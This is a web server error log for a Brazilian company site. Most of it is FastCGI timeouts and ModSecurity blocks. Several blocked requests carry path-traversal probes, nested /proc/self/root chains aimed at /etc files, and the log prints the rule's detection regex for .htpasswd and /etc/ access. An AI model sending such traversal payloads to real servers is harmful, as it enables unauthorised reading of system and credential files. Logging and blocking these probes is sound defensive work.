[Tue Mar 17 19:04:04.087995 2026] [proxy_fcgi:error] [pid 13577:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:60554] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:04:26.137855 2026] [proxy_fcgi:error] [pid 13577:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33054] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:04:49.161854 2026] [proxy_fcgi:error] [pid 11088:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33826] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:04:59.333330 2026] [:error] [pid 11561:tid 140411649607424] [client 74.7.243.128:42644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnQC4U5aF1mYwvX5tc3UgAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:05:12.141802 2026] [proxy_fcgi:error] [pid 13577:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34532] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:05:19.247550 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.243.128:55112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnQH3Ik7brgkOH-rIWqGQAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:05:34.141819 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35392] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:05:38.718475 2026] [:error] [pid 11088:tid 140411632822016] [client 74.7.243.128:38994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnQMmmqtCojLHvu5cKFhwAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Tue Mar 17 19:05:40.379143 2026] [:error] [pid 11088:tid 140411599251200] [client 74.7.243.128:40150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnQNGmqtCojLHvu5cKFiQAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 19:05:40.844967 2026] [:error] [pid 11088:tid 140411674785536] [client 216.73.216.191:57488] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnQNGmqtCojLHvu5cKFigAAAIg"]
[Tue Mar 17 19:05:57.317833 2026] [proxy_fcgi:error] [pid 12042:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35942] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:05:58.374508 2026] [:error] [pid 7004:tid 140411699963648] [client 74.7.243.128:42204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnQRsU6Sx0TG1YjmQjLiAAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:06:00.020825 2026] [:error] [pid 12775:tid 140411725141760] [client 74.7.228.61:49008] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnQSCYKDPifM2h9AK6-7QAAAsI"]
[Tue Mar 17 19:06:02.425689 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.243.128:42204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnQSsU6Sx0TG1YjmQjLjQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:06:20.090941 2026] [proxy_fcgi:error] [pid 25836:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36382] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:06:24.027228 2026] [:error] [pid 11088:tid 140411607643904] [client 74.7.244.43:45594] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnQYGmqtCojLHvu5cKFjgAAAJA"]
[Tue Mar 17 19:06:42.069833 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36804] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:07:03.137782 2026] [proxy_fcgi:error] [pid 11561:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37164] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:07:24.125891 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37522] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:07:25.180983 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:57322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnQneyqAr6etmhZHNpE5wAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 19:07:29.710618 2026] [:error] [pid 11561:tid 140411641214720] [client 74.7.243.128:37596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnQoYU5aF1mYwvX5tc3WAAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:07:45.137824 2026] [proxy_fcgi:error] [pid 7004:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37756] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:08:07.131608 2026] [proxy_fcgi:error] [pid 7004:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:38066] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:08:29.133795 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:08:50.136034 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38718] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:09:12.146065 2026] [proxy_fcgi:error] [pid 2598:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38988] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:09:14.731264 2026] [core:alert] [pid 2598:tid 140411574073088] [client 74.7.243.128:45294] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/include
[Tue Mar 17 19:09:35.122738 2026] [proxy_fcgi:error] [pid 7437:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39260] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:09:57.129793 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39676] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:09:57.462180 2026] [:error] [pid 11088:tid 140411582465792] [client 74.7.243.128:49724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnRNWmqtCojLHvu5cKFtgAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 19:10:02.411716 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:41676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnROta6ubjKNq_cu4Yk3QAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 19:10:18.137411 2026] [proxy_fcgi:error] [pid 11088:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40040] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:10:40.041852 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40360] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:10:45.605271 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.243.128:34610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnRZcU6Sx0TG1YjmQjL2QAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:11:02.109013 2026] [proxy_fcgi:error] [pid 7437:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40766] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:11:21.320615 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.228.61:53546] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnRifPqhzTj3BvfDX-lHgAAAcs"]
[Tue Mar 17 19:11:24.121850 2026] [proxy_fcgi:error] [pid 11816:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41122] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:11:37.948190 2026] [:error] [pid 11088:tid 140411658000128] [client 74.7.244.43:59520] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnRmWmqtCojLHvu5cKFyAAAAIo"]
[Tue Mar 17 19:11:46.045826 2026] [proxy_fcgi:error] [pid 12775:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41572] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:12:08.069976 2026] [proxy_fcgi:error] [pid 25836:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41952] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:12:30.057841 2026] [proxy_fcgi:error] [pid 12775:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42356] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:12:33.342596 2026] [:error] [pid 11088:tid 140411658000128] [client 74.7.243.128:51536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnR0WmqtCojLHvu5cKF2wAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:12:52.134995 2026] [proxy_fcgi:error] [pid 19507:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42890] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:13:14.121179 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43348] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:13:37.122109 2026] [proxy_fcgi:error] [pid 11561:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43956] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:13:59.033875 2026] [proxy_fcgi:error] [pid 11088:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44598] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:14:21.119729 2026] [proxy_fcgi:error] [pid 11561:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45206] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:14:44.130010 2026] [proxy_fcgi:error] [pid 2598:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45502] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:15:06.139773 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45710] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:15:28.133803 2026] [proxy_fcgi:error] [pid 7004:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45886] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:15:50.129782 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46164] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:16:24.125863 2026] [proxy_fcgi:error] [pid 29151:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46436] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:16:25.570923 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.228.61:41692] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnSuXIk7brgkOH-rIWqkgAAAVE"]
[Tue Mar 17 19:16:38.192571 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.244.43:56638] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnSxgeiSKl8TjouI-Y1aQAAA8M"]
[Tue Mar 17 19:16:51.849797 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46704] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:17:14.121848 2026] [proxy_fcgi:error] [pid 11088:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46884] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:17:23.931849 2026] [:error] [pid 19507:tid 140411632822016] [client 216.73.216.191:36350] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnS89Y0UrI5A3LftIwcTwAAAY0"]
[Tue Mar 17 19:17:36.119011 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47184] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:17:58.121826 2026] [proxy_fcgi:error] [pid 12775:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47470] AH01075: Error dispatching request to : (polling)
